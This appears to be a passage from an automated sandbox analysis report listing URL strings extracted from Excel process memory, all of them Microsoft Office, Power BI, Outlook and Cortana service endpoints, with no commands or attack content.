Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsj
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://apis.live.net/v5.0/ne
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.956514368.000000001340C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965853409.0000000013410000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://augloop-dogfood.officeppe.com;https://augloop-gcc.office.com;https://augloop.gov.online.offi
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://augloop.office.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://augloop.office.com9
Source: EXCEL.EXE, 00000000.00000003.957338414.000000001333C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965698498.000000001333C000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.
Source: EXCEL.EXE, 00000000.00000002.965714297.0000000013354000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957360365.0000000013354000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlk
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://cdn.entity.
Source: EXCEL.EXE, 00000000.00000002.963180768.000000000FA50000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsellN
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/#
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/W
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies;
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx9
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://config.edge.skype.com/config/v1/OfficeU
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://cortana.ai
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://cortana.ai/api
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://cortana.ai0
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://cortana.aietl
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://cr.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://cr.office.comn
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.com/I
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.comD1
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.comO1t
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.comd
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.o365filtering.como
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesx
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://dev.cortana.aiQ
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://directory.services.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr	String found in binary or memory: https://enrichment.osi.office.net/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp	String found in binary or memory: https://enrichment.osi.office.net/$
